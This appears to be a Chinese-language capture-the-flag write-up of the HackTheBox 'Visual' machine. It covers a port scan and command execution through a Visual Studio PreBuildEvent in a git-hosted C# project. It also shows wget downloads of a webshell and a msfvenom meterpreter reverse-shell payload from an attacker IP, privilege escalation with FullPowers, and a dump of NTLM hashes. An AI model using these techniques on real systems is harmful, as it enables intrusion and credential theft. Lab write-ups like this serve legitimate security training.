基本信息

https://app.hackthebox.com/machines/Visual
10.10.11.234

端口扫描

只有一个80:

$ nmap -sC -sV -Pn 10.10.11.234
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 14:18 CST
Nmap scan report for 10.10.11.234
Host is up (0.13s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-title: Visual - Revolutionizing Visual Studio Builds
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.04 seconds

80

页面就一个提交git repo url的功能，根据页面描述，会自动下载后编译C#项目：

visual

先简单测试，根据请求信息可以看出目标机器是先git clone，所以后面需要托管git，并且报错信息也可以确认是需要sln：

basic sln

先使用正常的项目进行测试，创建测试项目,根据网页信息，使用.net 6.0版本,并且因为需要git repo，所以也进行git操作：

dotnet new sln -n miao
dotnet new console -n miao -f net6.0
dotnet sln miao.sln add miao/miao.csproj

git init
git add .
git commit -m miao

然后托管，可以使用简单的server，git支持这种操作：

Git - git-update-server-info Documentation
https://git-scm.com/docs/git-update-server-info

1
2
3

cd .git
git update-server-info
python3 -m http.server 7777

提交测试，编译成功:

PreBuildEvent

这种场景，可以通过一些event来执行命令，例如直接在作者博客就能找到PreBuildEvent方法：

Exploring Backdooring Techniques in Visual Studio Projects - Enox Cyber Insights
https://enox.zip/Windows/Exploring+Backdooring+Techniques+in+Visual+Studio+Projects

执行命令得到reverse shell：

user flag

enox用户桌面得到user flag：

webshell

因为是windows机器，web服务一般是通过service账号运行的，所以尝试写一个webshell查看权限，确认是local service：

1
2
3

PS C:\xampp\htdocs> wget http://10.10.16.10:7778/shell.php -O shell.php
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.16.10 LPORT=4444 -f exe -o shell.exe
PS C:\xampp\htdocs> wget http://10.10.16.10:7778/shell.exe -O shell.exe

但当前service并没有正常service该有的SeImpersonate 权限：

FullPowers

搜索可以找到解决方法：

itm4n/FullPowers: Recover the default privilege set of a LOCAL/NETWORK SERVICE account
https://github.com/itm4n/FullPowers

1	PS C:\xampp\htdocs> wget http://10.10.16.10:7778/FullPowers.exe -O FullPowers.exe

执行后拿回了该有的SeImpersonate:

service to system

然后就是常规的service to system，msf自带的getsystem自动不成功，但可以手动指定使用的技术：

root flag

Administrator桌面：

hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:10046f9fc76c7ec1f9486d70e6afcd94:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
enox:1003:aad3b435b51404eeaad3b435b51404ee:004cf6f1669e26d35ca239ac829b90e3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3da5714cb9f14076a132e06906a86b0d:::

参考资料

Git - git-update-server-info Documentation
https://git-scm.com/docs/git-update-server-info
Exploring Backdooring Techniques in Visual Studio Projects - Enox Cyber Insights
https://enox.zip/Windows/Exploring+Backdooring+Techniques+in+Visual+Studio+Projects
itm4n/FullPowers: Recover the default privilege set of a LOCAL/NETWORK SERVICE account
https://github.com/itm4n/FullPowers

Visual - HackTheBox

2023-10-08